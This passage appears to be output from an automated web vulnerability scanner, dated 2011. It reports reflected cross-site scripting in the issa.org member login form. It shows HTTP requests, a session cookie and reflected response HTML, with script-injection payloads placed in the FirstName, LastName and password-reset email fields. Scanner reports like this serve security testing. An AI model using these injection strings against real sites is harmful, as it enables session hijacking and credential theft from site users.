<script type="text/javaScript" src="/js/nav.js"></script>
<script type="text/javaScript" src="/js/antispam.js"></script>
<script type="text/javaScript" src="/js/table.js"></script>
<script type="text/javascript">
<!--
$(document).ready(
function()
{
renderBanners();
alternateRowColors();
$("a[@name]").css({padding: "0", background: "none"});
var CurrentHeight = 0;
$(document).ready(function() {
resizeULs();
});
$(window).bind("resize", function() {
resizeULs();
});
}
);
function resizeULs()
{
$("ul.Layout").each(function(j) {
CurrentHeight = 0;
$(this).find("li").each(function(i) {
if (CurrentHeight < $(this).height()) {
CurrentHeight = $(this).height();
}
});
$(this).find("li").each(function(i) {
$(this).css("padding-bottom", (CurrentHeight - $(this).height() + i) + "px");
});
});
}
function resize(div){
var d=document.getElementById(div);
if(navigator.appName=="Microsoft Internet Explorer"){
//ie
if(navigator.appVersion.indexOf('MSIE')>0){
d.style.height=document.documentElement.scrollHeight;
}
}else if(navigator.userAgent.indexOf("Chrome")>0){
//chrome
d.style.height=document.body.scrollHeight+"px";
}else{
//ff and all other nice browsers
d.style.height=document.documentElement.scrollHeight+"px";
}
}
-->
</script>
<!--<script>
$(function(){
$('#Sponsors').cycle({
fx: 'fade',
delay: -500
});
});
</script>-->
</head>
<body>
<div id="wrapLeft">
<div id="wrapRight">
<div id="Container">
<div id="TopBar">
<a id="NewsFeed" href="https://connect.issa.org
">Log in and check out the new ISSA Connect!</a>
<a href="/" id="Home">Home</a>
<a href="/page/?p=Site_Map_2" id="SiteMap">Site Map</a>
<a href="/Members/Log-In.php" id="LogIn">Log In</a>
<a href="/page/?p=33" id="Contact">Contact</a>
</div>
<div id="LogoBar">
<div id="searchFormContainer">
<div id="searchForm">
<form name="search" method="get" action="/search.php">
<a href="javascript:document.search.submit();">search</a>
<input type="text" name="q" size="20" style="font-size:12px;border-width:1px;" />
</form>
</div>
</div>
<a href="/" id="Logo"></a>
<div style="width:409px;height:85px;">
</div>
</div>
<div id="nav">
<ul id="jsddm">
<li><a href="/page/?p=Profile_16">About ISSA</a>
<ul>
<li><a href="/page/?p=Profile_16">Association</a></li>
<li><a href="/page/?p=77">International Board</a></li>
<li><a href="/page/?p=17">Code of Ethics</a></li>
<li><a href="/page/?p=33">Contact</a></li>
<li><a href="http://ciso.issa.org/">CISO Executive Forum</a></li>
<!--<li><a href="/Association/25year.html">25th Anniversary</a></li>-->
<li><a href="/page/?p=18">FAQ</a></li>
</ul>
</li>
<li><a href="https://connect.issa.org/index.jspa">Connect</a>
<ul>
<li><a href="/page/?p=Benefits_of_Membership_9">Benefits of Membership</a></li>
<li><a href="https://www.issa.org/page/?p=86">Dues</a></li>
<li><a href="https://connect.issa.org/index.jspa">ISSA Connect</a></li>
<li><a href="/page/?p=Application_Form_6">Membership Application</a></li>
<li><a href="/page/?p=Membership_Types_10">Membership Types</a></li>
<!--<li><a href="/page/?p=Join_Online_8">Join Online</a></li>-->
<!--<li><a href="/page/?p=Renew_Online_7">Renew Online</a></li>-->
</ul>
</li>
<li><a href="#">Learn</a>
<ul>
<li><a href="http://ciso.issa.org/">CISO Executive Forum</a></li>
<li><a href="/News/">E-News</a></li>
<li><a href="/events/#2">Industry Events</a></li>
<li><a href="/page/?p=70">Industry Webinars</a></li>
<li><a href="/page/?p=105">International Conference</a></li>
<li><a href="/events/#1">ISSA Events</a></li>
<li><a href="/Members/Journal/">ISSA Journal</a></li>
<li><a href="/page/?p=57">ISSA Web Conferences</a></li>
<li><a href="/page/?p=Whitepapers_11">Whitepapers</a></li>
</ul>
</li>
<li><a href="#">Advance</a>
<ul>
<li><a href="/page/?p=21">Award - Honorees</a></li>
<li><a href="/page/?p=Careers_12">Career Center</a></li>
<li><a href="/page/?p=20">Community Outreach</a></li>
<li><a href="/page/?p=117">Educational Advisory Council</a></li>
<li><a href="/page/?p=269">Fellow Program</a></li>
<li><a href="/page/?p=Certifications_13">Industry Certifications</a></li>
</ul>
</li>
<li><a href="/Members/Your-Profile.html">Members</a>
<ul>
<li><a href="/page/?p=138">Elections</a></li>
<li><a href="/Resources/?p=SupportMaterials">Member Resources</a></li>
<li><a href="/Members/Member-Search.html">Member Search</a></li>
<li><a href="/page/?p=78">Membership Card</a></li>
<li><a href="/Members/Your-Profile.html">My Profile</a></li>
<li><a href="/page/?p=ISSA_Buyers_Guide_and_Discount_Directory_3">Special Offers</a></li>
<li><a href="/page/?p=Call_for_Volunteers_5">Volunteer</a></li>
</ul>
</li>
<li><a href="#">Chapters</a>
<ul>
<li><a href="/Chapters/Chapter-Administration.html">Admin</a></li>
<li><a href="/Chapters/Chapter-Directory.html">Chapter Directory</a></li>
<li><a href="/conf/?p=172">Chapter Leaders Congress</a></li>
<li><a href="/Chapters/?p=CPAC">CPAC Information</a></li>
<li><a href="/Members/Log-In.php">Officer Login</a></li>
<li><a href="/page/?p=27">Start a Chapter</a></li>
</ul>
</li>
<li><a href="#">Sponsorship</a>
<ul>
<li><a href="/page/?p=41">Become a Sponsor</a></li>
<li><a href="/Members/Journal/">ISSA Journal</a></li>
<li><a href="/Sponsorship/?p=MediaKit">Media Kit</a></li>
<li><a href="/page/?p=ISSA_Sponsors_39">Patron Sponsors</a></li>
</ul>
</li>
<li><a><span style="color:#FFB90F"><strong>Join Now</strong></span></a>
<ul>
<li><a href="/page/?p=Join_Online_8">New Members</a></li>
<li><a href="/Join/Renew-Online.html">Returning Members</a></li>
</ul>
</li>
</ul>
</div>
<div id="Content">
<script type="text/javascript" src="sha1.js"></script> <script language="javascript"> <!-- CurrentlyVisible = "MemberNumber"; function SelectRadio(IDtoSelect) { document.getElementById("Use" + IDtoSelect).checked="true"; document.getElementById(CurrentlyVisible + "Identification").style.display="none"; if (IDtoSelect == "AccountReset") { document.getElementById("loginBlockTwo").style.borderRight="none"; document.getElementById("loginBlockThree").style.display="none"; } else { document.getElementById("loginBlockTwo").style.borderRight="1px solid #CCCCCC"; document.getElementById("loginBlockThree").style.display="block"; } document.getElementById(IDtoSelect + "Identification").style.display="block"; if (IDtoSelect == 'EmailFirstLast') { ObjectSelected = document.getElementById('EmailAddress'); ObjectSelected.focus(); } else if (IDtoSelect == 'AccountReset') { ObjectSelected = document.getElementById('EmailAddressReset'); ObjectSelected.focus(); } else { ObjectSelected = document.getElementById(IDtoSelect); ObjectSelected.focus(); } CurrentlyVisible = IDtoSelect; } --> </script> <style type="text/css"> <!-- label:hover { cursor: pointer; } td#loginBlockOne { padding: 0; border: none; } td#loginBlockOne td { border: none; padding: .25em; vertical-align: middle; } td#loginBlockOne label { font-family: Tahoma, sans-serif; font-size: .9em; margin: 0; padding: 0; } td#loginBlockTwo { padding: 0; padding-left: 1%; border: none; border-left: 1px solid #CCCCCC; border-right: 1px solid #CCCCCC; } input.TextField { width: 80%; max-width: 15em; } td#loginBlockThree { padding: 0; padding-left: 1%; border: none; } h2.loginBlock { padding: 0; margin: 0; border: none; } div#MemberNumberIdentification { display:block; } div#UsernameIdentification { display:none; } div#EmailFirstLastIdentification { display:none; } div#AccountResetIdentification { display:none; } --> </style> <div id="ColumnB"> <p class="ErrorMessage"><strong>ERROR:</strong> The credentials provided do not match membership records. Please try again.</p><h1>Member Login</h1> <form id="LogInForm" method="POST" action=""> <input type="hidden" name="d" value="https://www.issa.org/Members/Log-In.php"> <table style="position: relative"> <tr> <td id="loginBlockOne" width="33%"> <h2 class="loginBlock">1. Login Type</h2> <table> <tr> <td><input name="LoginType" type="radio" value="MemberNumber" id="UseMemberNumber" checked onMouseUp="SelectRadio('MemberNumber');" /></td> <td><label for="UseMemberNumber" onMouseUp="SelectRadio('MemberNumber');">Member Number</label></td> </tr> <tr> <td><input name="LoginType" type="radio" value="Username" id="UseUsername" onMouseUp="SelectRadio('Username');" /></td> <td><label for="UseUsername" onMouseUp="SelectRadio('Username');">Username</label></td> </tr> <tr> <td><input name="LoginType" type="radio" value="EmailFirstLast" id="UseEmailFirstLast" onMouseUp="SelectRadio('EmailFirstLast');" /></td> <td><label for="UseEmailFirstLast" onMouseUp="SelectRadio('EmailFirstLast');">E-mail, First Name, Last Name</label></td> </tr> <tr> <td><input name="LoginType" type="radio" value="AccountReset" id="UseAccountReset" onMouseUp="SelectRadio('AccountReset');" /></td> <td><label for="UseAccountReset" onMouseUp="SelectRadio('AccountReset');">New Account or Forgotten Password</label></td> </tr> </table> </td> <td id="loginBlockTwo" width="31%"> <h2 class="loginBlock">2. Identification</h2> <div id="MemberNumberIdentification"> <h3>Member Number</h3> <input type="text" id="MemberNumber" name="MemberNumber" class="TextField" value="3" /> </div> <div id="UsernameIdentification"> <h3>Username</h3> <input type="text" id="Username" name="Username" class="TextField" value="Smith" /> <p><strong>NOTE:</strong> Usernames are no longer issued. If you have one, you may use it; otherwise, please use your member number.</p> </div> <div id="EmailFirstLastIdentification"> <h3>Email Address</h3> <input type="text" id="EmailAddress" name="EmailAddress" class="TextField" value="netsparker@example.com" /> <h3>First Name</h3> <input type="text" id="FirstName" name="FirstName" class="TextField" value="Smith" /> <h3>Last Name</h3> <input type="text" id="LastName" name="LastName" class="TextField" value="Smith" /> </div> <div id="AccountResetIdentification"> <h3>Email Address</h3> <input type="text" id="EmailAddressReset" name="EmailAddressReset" class="TextField" value="\'\"--></style></script><script>netsparker(0x00009B)</script>" /> <p><input type="submit" id="Reset" value="Reset Password"></p> <p><strong>NOTE:</strong> if you don't know your e-mail address, please <a href="/Association/Contact.html">call ISSA</a> for password reset assistance.</p> </div> </td> <td id="loginBlockThree"> <h2 class..
Parameters
Parameter
|
Type
|
Value
|
d
|
POST
|
https://www.issa.org/Members/Log-In.php
|
EmailAddress
|
POST
|
netsparker@example.com
|
EmailAddressReset
|
POST
|
netsparker@example.com
|
FirstName
|
POST
|
'"--></style></script><script>alert(0x00009E)</script>
|
LastName
|
POST
|
Smith
|
LoginType
|
POST
|
MemberNumber
|
MemberNumber
|
POST
|
3
|
SubmittedPassword
|
POST
|
3
|
Username
|
POST
|
Smith
|
Request
POST /Members/Log-In.php HTTP/1.1
Referer: https://www.issa.org/Members/Log-In.php
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)
Cache-Control: no-cache
Content-Type: application/x-www-form-urlencoded
Host: www.issa.org
Cookie: cookiecheck=issa; PHPSESSID=d959e12eb1519d0294397b6c62589f93
Content-Length: 316
Accept-Encoding: gzip, deflate
d=https%3a%2f%2fwww.issa.org%2fMembers%2fLog-In.php&EmailAddress=netsparker%40example.com&EmailAddressReset=netsparker%40example.com&FirstName='%22--%3e%3c%2fstyle%3e%3c%2fscript%3e%3cscript%3enetsparker(0x00009E)%3c%2fscript%3e&LastName=Smith&LoginType=MemberNumber&MemberNumber=3&SubmittedPassword=3&Username=Smith
Response
HTTP/1.1 200 OK
Date: Wed, 27 Apr 2011 21:35:31 GMT
Server: Apache/2.2.15 (Unix) mod_ssl/2.2.15 OpenSSL/0.9.8b mod_bwlimited/1.4 PHP/5.2.9
X-Powered-By: PHP/5.2.9
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: cookiecheck=issa
Connection: close
Transfer-Encoding: chunked
Content-Type: text/html
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head><title>Member Login</title>
<meta name="description" content="The ISSA is an unbiased third party made up solely of security practitioners and, as such, is not motivated by politics or profits; only the ethical professionalism of our members and their dedication to protecting information resources in a professional manner. ">
<meta name="keywords" content="security, security association, network security, internet security, data security">
<meta name="verify-v1" content="FwJolkV798m+nBxL9ELBCqQEogmxS8dxHUGv89Q1naM=" />
<meta http-equiv="Content-Type" content="text/html; charset=UTF-8" />
<meta http-equiv="X-UA-Compatible" content="IE=EmulateIE7"/>
<link rel="shortcut icon" href="/favicon.ico" type="image/x-icon" />
<link href="/css/FluidOneColumn.css" rel="stylesheet" type="text/css" />
<link href="/css/issa.css" rel="stylesheet" type="text/css" />
<link href="/css/nav.css" rel="stylesheet" type="text/css" />
<script type="text/javaScript" src="/js/jquery.js"></script>
<script type="text/javaScript" src="/js/nav.js"></script>
<script type="text/javaScript" src="/js/antispam.js"></script>
<script type="text/javaScript" src="/js/table.js"></script>
<script type="text/javascript">
<!--
$(document).ready(
function()
{
renderBanners();
alternateRowColors();
$("a[@name]").css({padding: "0", background: "none"});
var CurrentHeight = 0;
$(document).ready(function() {
resizeULs();
});
$(window).bind("resize", function() {
resizeULs();
});
}
);
function resizeULs()
{
$("ul.Layout").each(function(j) {
CurrentHeight = 0;
$(this).find("li").each(function(i) {
if (CurrentHeight < $(this).height()) {
CurrentHeight = $(this).height();
}
});
$(this).find("li").each(function(i) {
$(this).css("padding-bottom", (CurrentHeight - $(this).height() + i) + "px");
});
});
}
function resize(div){
var d=document.getElementById(div);
if(navigator.appName=="Microsoft Internet Explorer"){
//ie
if(navigator.appVersion.indexOf('MSIE')>0){
d.style.height=document.documentElement.scrollHeight;
}
}else if(navigator.userAgent.indexOf("Chrome")>0){
//chrome
d.style.height=document.body.scrollHeight+"px";
}else{
//ff and all other nice browsers
d.style.height=document.documentElement.scrollHeight+"px";
}
}
-->
</script>
<!--<script>
$(function(){
$('#Sponsors').cycle({
fx: 'fade',
delay: -500
});
});
</script>-->
</head>
<body>
<div id="wrapLeft">
<div id="wrapRight">
<div id="Container">
<div id="TopBar">
<a id="NewsFeed" href="https://connect.issa.org
">Log in and check out the new ISSA Connect!</a>
<a href="/" id="Home">Home</a>
<a href="/page/?p=Site_Map_2" id="SiteMap">Site Map</a>
<a href="/Members/Log-In.php" id="LogIn">Log In</a>
<a href="/page/?p=33" id="Contact">Contact</a>
</div>
<div id="LogoBar">
<div id="searchFormContainer">
<div id="searchForm">
<form name="search" method="get" action="/search.php">
<a href="javascript:document.search.submit();">search</a>
<input type="text" name="q" size="20" style="font-size:12px;border-width:1px;" />
</form>
</div>
</div>
<a href="/" id="Logo"></a>
<div style="width:409px;height:85px;">
</div>
</div>
<div id="nav">
<ul id="jsddm">
<li><a href="/page/?p=Profile_16">About ISSA</a>
<ul>
<li><a href="/page/?p=Profile_16">Association</a></li>
<li><a href="/page/?p=77">International Board</a></li>
<li><a href="/page/?p=17">Code of Ethics</a></li>
<li><a href="/page/?p=33">Contact</a></li>
<li><a href="http://ciso.issa.org/">CISO Executive Forum</a></li>
<!--<li><a href="/Association/25year.html">25th Anniversary</a></li>-->
<li><a href="/page/?p=18">FAQ</a></li>
</ul>
</li>
<li><a href="https://connect.issa.org/index.jspa">Connect</a>
<ul>
<li><a href="/page/?p=Benefits_of_Membership_9">Benefits of Membership</a></li>
<li><a href="https://www.issa.org/page/?p=86">Dues</a></li>
<li><a href="https://connect.issa.org/index.jspa">ISSA Connect</a></li>
<li><a href="/page/?p=Application_Form_6">Membership Application</a></li>
<li><a href="/page/?p=Membership_Types_10">Membership Types</a></li>
<!--<li><a href="/page/?p=Join_Online_8">Join Online</a></li>-->
<!--<li><a href="/page/?p=Renew_Online_7">Renew Online</a></li>-->
</ul>
</li>
<li><a href="#">Learn</a>
<ul>
<li><a href="http://ciso.issa.org/">CISO Executive Forum</a></li>
<li><a href="/News/">E-News</a></li>
<li><a href="/events/#2">Industry Events</a></li>
<li><a href="/page/?p=70">Industry Webinars</a></li>
<li><a href="/page/?p=105">International Conference</a></li>
<li><a href="/events/#1">ISSA Events</a></li>
<li><a href="/Members/Journal/">ISSA Journal</a></li>
<li><a href="/page/?p=57">ISSA Web Conferences</a></li>
<li><a href="/page/?p=Whitepapers_11">Whitepapers</a></li>
</ul>
</li>
<li><a href="#">Advance</a>
<ul>
<li><a href="/page/?p=21">Award - Honorees</a></li>
<li><a href="/page/?p=Careers_12">Career Center</a></li>
<li><a href="/page/?p=20">Community Outreach</a></li>
<li><a href="/page/?p=117">Educational Advisory Council</a></li>
<li><a href="/page/?p=269">Fellow Program</a></li>
<li><a href="/page/?p=Certifications_13">Industry Certifications</a></li>
</ul>
</li>
<li><a href="/Members/Your-Profile.html">Members</a>
<ul>
<li><a href="/page/?p=138">Elections</a></li>
<li><a href="/Resources/?p=SupportMaterials">Member Resources</a></li>
<li><a href="/Members/Member-Search.html">Member Search</a></li>
<li><a href="/page/?p=78">Membership Card</a></li>
<li><a href="/Members/Your-Profile.html">My Profile</a></li>
<li><a href="/page/?p=ISSA_Buyers_Guide_and_Discount_Directory_3">Special Offers</a></li>
<li><a href="/page/?p=Call_for_Volunteers_5">Volunteer</a></li>
</ul>
</li>
<li><a href="#">Chapters</a>
<ul>
<li><a href="/Chapters/Chapter-Administration.html">Admin</a></li>
<li><a href="/Chapters/Chapter-Directory.html">Chapter Directory</a></li>
<li><a href="/conf/?p=172">Chapter Leaders Congress</a></li>
<li><a href="/Chapters/?p=CPAC">CPAC Information</a></li>
<li><a href="/Members/Log-In.php">Officer Login</a></li>
<li><a href="/page/?p=27">Start a Chapter</a></li>
</ul>
</li>
<li><a href="#">Sponsorship</a>
<ul>
<li><a href="/page/?p=41">Become a Sponsor</a></li>
<li><a href="/Members/Journal/">ISSA Journal</a></li>
<li><a href="/Sponsorship/?p=MediaKit">Media Kit</a></li>
<li><a href="/page/?p=ISSA_Sponsors_39">Patron Sponsors</a></li>
</ul>
</li>
<li><a><span style="color:#FFB90F"><strong>Join Now</strong></span></a>
<ul>
<li><a href="/page/?p=Join_Online_8">New Members</a></li>
<li><a href="/Join/Renew-Online.html">Returning Members</a></li>
</ul>
</li>
</ul>
</div>
<div id="Content">
<script type="text/javascript" src="sha1.js"></script> <script language="javascript"> <!-- CurrentlyVisible = "MemberNumber"; function SelectRadio(IDtoSelect) { document.getElementById("Use" + IDtoSelect).checked="true"; document.getElementById(CurrentlyVisible + "Identification").style.display="none"; if (IDtoSelect == "AccountReset") { document.getElementById("loginBlockTwo").style.borderRight="none"; document.getElementById("loginBlockThree").style.display="none"; } else { document.getElementById("loginBlockTwo").style.borderRight="1px solid #CCCCCC"; document.getElementById("loginBlockThree").style.display="block"; } document.getElementById(IDtoSelect + "Identification").style.display="block"; if (IDtoSelect == 'EmailFirstLast') { ObjectSelected = document.getElementById('EmailAddress'); ObjectSelected.focus(); } else if (IDtoSelect == 'AccountReset') { ObjectSelected = document.getElementById('EmailAddressReset'); ObjectSelected.focus(); } else { ObjectSelected = document.getElementById(IDtoSelect); ObjectSelected.focus(); } CurrentlyVisible = IDtoSelect; } --> </script> <style type="text/css"> <!-- label:hover { cursor: pointer; } td#loginBlockOne { padding: 0; border: none; } td#loginBlockOne td { border: none; padding: .25em; vertical-align: middle; } td#loginBlockOne label { font-family: Tahoma, sans-serif; font-size: .9em; margin: 0; padding: 0; } td#loginBlockTwo { padding: 0; padding-left: 1%; border: none; border-left: 1px solid #CCCCCC; border-right: 1px solid #CCCCCC; } input.TextField { width: 80%; max-width: 15em; } td#loginBlockThree { padding: 0; padding-left: 1%; border: none; } h2.loginBlock { padding: 0; margin: 0; border: none; } div#MemberNumberIdentification { display:block; } div#UsernameIdentification { display:none; } div#EmailFirstLastIdentification { display:none; } div#AccountResetIdentification { display:none; } --> </style> <div id="ColumnB"> <p class="ErrorMessage"><strong>ERROR:</strong> The credentials provided do not match membership records. Please try again.</p><h1>Member Login</h1> <form id="LogInForm" method="POST" action=""> <input type="hidden" name="d" value="https://www.issa.org/Members/Log-In.php"> <table style="position: relative"> <tr> <td id="loginBlockOne" width="33%"> <h2 class="loginBlock">1. Login Type</h2> <table> <tr> <td><input name="LoginType" type="radio" value="MemberNumber" id="UseMemberNumber" checked onMouseUp="SelectRadio('MemberNumber');" /></td> <td><label for="UseMemberNumber" onMouseUp="SelectRadio('MemberNumber');">Member Number</label></td> </tr> <tr> <td><input name="LoginType" type="radio" value="Username" id="UseUsername" onMouseUp="SelectRadio('Username');" /></td> <td><label for="UseUsername" onMouseUp="SelectRadio('Username');">Username</label></td> </tr> <tr> <td><input name="LoginType" type="radio" value="EmailFirstLast" id="UseEmailFirstLast" onMouseUp="SelectRadio('EmailFirstLast');" /></td> <td><label for="UseEmailFirstLast" onMouseUp="SelectRadio('EmailFirstLast');">E-mail, First Name, Last Name</label></td> </tr> <tr> <td><input name="LoginType" type="radio" value="AccountReset" id="UseAccountReset" onMouseUp="SelectRadio('AccountReset');" /></td> <td><label for="UseAccountReset" onMouseUp="SelectRadio('AccountReset');">New Account or Forgotten Password</label></td> </tr> </table> </td> <td id="loginBlockTwo" width="31%"> <h2 class="loginBlock">2. Identification</h2> <div id="MemberNumberIdentification"> <h3>Member Number</h3> <input type="text" id="MemberNumber" name="MemberNumber" class="TextField" value="3" /> </div> <div id="UsernameIdentification"> <h3>Username</h3> <input type="text" id="Username" name="Username" class="TextField" value="Smith" /> <p><strong>NOTE:</strong> Usernames are no longer issued. If you have one, you may use it; otherwise, please use your member number.</p> </div> <div id="EmailFirstLastIdentification"> <h3>Email Address</h3> <input type="text" id="EmailAddress" name="EmailAddress" class="TextField" value="netsparker@example.com" /> <h3>First Name</h3> <input type="text" id="FirstName" name="FirstName" class="TextField" value="\'\"--></style></script><script>netsparker(0x00009E)</script>" /> <h3>Last Name</h3> <input type="text" id="LastName" name="LastName" class="TextField" value="Smith" /> </div> <div id="AccountResetIdentification"> <h3>Email Address</h3> <input type="text" id="EmailAddressReset" name="EmailAddressReset" class="TextField" value="netsparker@example.com" /> <p><input type="submit" id="Reset" value="Reset Password"></p> <p><strong>NOTE:</strong> if you don't know your e-mail address, please <a href="/Association/Contact.html">call ISSA</a> for password reset assistance.</p> </div> </td> <td id="loginBlockThree"> ..
Parameters
Parameter
|
Type
|
Value
|
d
|
POST
|
https://www.issa.org/Members/Log-In.php
|
EmailAddress
|
POST
|
netsparker@example.com
|
EmailAddressReset
|
POST
|
netsparker@example.com
|
FirstName
|
POST
|
Smith
|
LastName
|
POST
|
'"--></style></script><script>alert(0x0000A1)</script>
|
LoginType
|
POST
|
MemberNumber
|
MemberNumber
|
POST
|
3
|
SubmittedPassword
|
POST
|
3
|
Username
|
POST
|
Smith
|
Request
POST /Members/Log-In.php HTTP/1.1
Referer: https://www.issa.org/Members/Log-In.php
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)
Cache-Control: no-cache
Content-Type: application/x-www-form-urlencoded
Host: www.issa.org
Cookie: cookiecheck=issa; PHPSESSID=d959e12eb1519d0294397b6c62589f93
Content-Length: 316
Accept-Encoding: gzip, deflate
d=https%3a%2f%2fwww.issa.org%2fMembers%2fLog-In.php&EmailAddress=netsparker%40example.com&EmailAddressReset=netsparker%40example.com&FirstName=Smith&LastName='%22--%3e%3c%2fstyle%3e%3c%2fscript%3e%3cscript%3enetsparker(0x0000A1)%3c%2fscript%3e&LoginType=MemberNumber&MemberNumber=3&SubmittedPassword=3&Username=Smith
Response
HTTP/1.1 200 OK
Date: Wed, 27 Apr 2011 21:35:39 GMT
Server: Apache/2.2.15 (Unix) mod_ssl/2.2.15 OpenSSL/0.9.8b mod_bwlimited/1.4 PHP/5.2.9
X-Powered-By: PHP/5.2.9
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: cookiecheck=issa
Connection: close
Transfer-Encoding: chunked
Content-Type: text/html
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head><title>Member Login</title>
<meta name="description" content="The ISSA is an unbiased third party made up solely of security practitioners and, as such, is not motivated by politics or profits; only the ethical professionalism of our members and their dedication to protecting information resources in a professional manner. ">
<meta name="keywords" content="security, security association, network security, internet security, data security">
<meta name="verify-v1" content="FwJolkV798m+nBxL9ELBCqQEogmxS8dxHUGv89Q1naM=" />
<meta http-equiv="Content-Type" content="text/html; charset=UTF-8" />
<meta http-equiv="X-UA-Compatible" content="IE=EmulateIE7"/>
<link rel="shortcut icon" href="/favicon.ico" type="image/x-icon" />
<link href="/css/FluidOneColumn.css" rel="stylesheet" type="text/css" />
<link href="/css/issa.css" rel="stylesheet" type="text/css" />
<link href="/css/nav.css" rel="stylesheet" type="text/css" />
<script type="text/javaScript" src="/js/jquery.js"></script>
<script type="text/javaScript" src="/js/nav.js"></script>
<script type="text/javaScript" src="/js/antispam.js"></script>
<script type="text/javaScript" src="/js/table.js"></script>
<script type="text/javascript">
<!--
$(document).ready(
function()
{
renderBanners();
alternateRowColors();
$("a[@name]").css({padding: "0", background: "none"});
var CurrentHeight = 0;
$(document).ready(function() {
resizeULs();
});
$(window).bind("resize", function() {
resizeULs();
});
}
);
function resizeULs()
{
$("ul.Layout").each(function(j) {
CurrentHeight = 0;
$(this).find("li").each(function(i) {
if (CurrentHeight < $(this).height()) {
CurrentHeight = $(this).height();
}
});
$(this).find("li").each(function(i) {
$(this).css("padding-bottom", (CurrentHeight - $(this).height() + i) + "px");
});
});
}
function resize(div){
var d=document.getElementById(div);
if(navigator.appName=="Microsoft Internet Explorer"){
//ie
if(navigator.appVersion.indexOf('MSIE')>0){
d.style.height=document.documentElement.scrollHeight;
}
}else if(navigator.userAgent.indexOf("Chrome")>0){
//chrome
d.style.height=document.body.scrollHeight+"px";
}else{
//ff and all other nice browsers
d.style.height=document.documentElement.scrollHeight+"px";
}
}
-->
</script>
<!--<script>
$(function(){
$('#Sponsors').cycle({
fx: 'fade',
delay: -500
});
});
</script>-->
</head>
<body>
<div id="wrapLeft">
<div id="wrapRight">
<div id="Container">
<div id="TopBar">
<a id="NewsFeed" href="https://connect.issa.org
">Log in and check out the new ISSA Connect!</a>
<a href="/" id="Home">Home</a>
<a href="/page/?p=Site_Map_2" id="SiteMap">Site Map</a>
<a href="/Members/Log-In.php" id="LogIn">Log In</a>
<a href="/page/?p=33" id="Contact">Contact</a>
</div>
<div id="LogoBar">
<div id="searchFormContainer">
<div id="searchForm">
<form name="search" method="get" action="/search.php">
<a href="javascript:document.search.submit();">search</a>
<input type="text" name="q" size="20" style="font-size:12px;border-width:1px;" />
</form>
</div>
</div>
<a href="/" id="Logo"></a>
<div style="width:409px;height:85px;">
</div>
</div>
<div id="nav">
<ul id="jsddm">
<li><a href="/page/?p=Profile_16">About ISSA</a>
<ul>
<li><a href="/page/?p=Profile_16">Association</a></li>
<li><a href="/page/?p=77">International Board</a></li>
<li><a href="/page/?p=17">Code of Ethics</a></li>
<li><a href="/page/?p=33">Contact</a></li>
<li><a href="http://ciso.issa.org/">CISO Executive Forum</a></li>
<!--<li><a href="/Association/25year.html">25th Anniversary</a></li>-->
<li><a href="/page/?p=18">FAQ</a></li>
</ul>
</li>
<li><a href="https://connect.issa.org/index.jspa">Connect</a>
<ul>
<li><a href="/page/?p=Benefits_of_Membership_9">Benefits of Membership</a></li>
<li><a href="https://www.issa.org/page/?p=86">Dues</a></li>
<li><a href="https://connect.issa.org/index.jspa">ISSA Connect</a></li>
<li><a href="/page/?p=Application_Form_6">Membership Application</a></li>
<li><a href="/page/?p=Membership_Types_10">Membership Types</a></li>
<!--<li><a href="/page/?p=Join_Online_8">Join Online</a></li>-->
<!--<li><a href="/page/?p=Renew_Online_7">Renew Online</a></li>-->
</ul>
</li>
<li><a href="#">Learn</a>
<ul>
<li><a href="http://ciso.issa.org/">CISO Executive Forum</a></li>
<li><a href="/News/">E-News</a></li>
<li><a href="/events/#2">Industry Events</a></li>
<li><a href="/page/?p=70">Industry Webinars</a></li>
<li><a href="/page/?p=105">International Conference</a></li>
<li><a href="/events/#1">ISSA Events</a></li>
<li><a href="/Members/Journal/">ISSA Journal</a></li>
<li><a href="/page/?p=57">ISSA Web Conferences</a></li>
<li><a href="/page/?p=Whitepapers_11">Whitepapers</a></li>
</ul>
</li>
<li><a href="#">Advance</a>
<ul>
<li><a href="/page/?p=21">Award - Honorees</a></li>
<li><a href="/page/?p=Careers_12">Career Center</a></li>
<li><a href="/page/?p=20">Community Outreach</a></li>
<li><a href="/page/?p=117">Educational Advisory Council</a></li>
<li><a href="/page/?p=269">Fellow Program</a></li>
<li><a href="/page/?p=Certifications_13">Industry Certifications</a></li>
</ul>
</li>
<li><a href="/Members/Your-Profile.html">Members</a>
<ul>
<li><a href="/page/?p=138">Elections</a></li>
<li><a href="/Resources/?p=SupportMaterials">Member Resources</a></li>
<li><a href="/Members/Member-Search.html">Member Search</a></li>
<li><a href="/page/?p=78">Membership Card</a></li>
<li><a href="/Members/Your-Profile.html">My Profile</a></li>
<li><a href="/page/?p=ISSA_Buyers_Guide_and_Discount_Directory_3">Special Offers</a></li>
<li><a href="/page/?p=Call_for_Volunteers_5">Volunteer</a></li>
</ul>
</li>
<li><a href="#">Chapters</a>
<ul>
<li><a href="/Chapters/Chapter-Administration.html">Admin</a></li>
<li><a href="/Chapters/Chapter-Directory.html">Chapter Directory</a></li>
<li><a href="/conf/?p=172">Chapter Leaders Congress</a></li>
<li><a href="/Chapters/?p=CPAC">CPAC Information</a></li>
<li><a href="/Members/Log-In.php">Officer Login</a></li>
<li><a href="/page/?p=27">Start a Chapter</a></li>
</ul>
</li>
<li><a href="#">Sponsorship</a>
<ul>
<li><a href="/page/?p=41">Become a Sponsor</a></li>
<li><a href="/Members/Journal/">ISSA Journal</a></li>
<li><a href="/Sponsorship/?p=MediaKit">Media Kit</a></li>
<li><a href="/page/?p=ISSA_Sponsors_39">Patron Sponsors</a></li>
</ul>
</li>
<li><a><span style="color:#FFB90F"><strong>Join Now</strong></span></a>
<ul>
<li><a href="/page/?p=Join_Online_8">New Members</a></li>
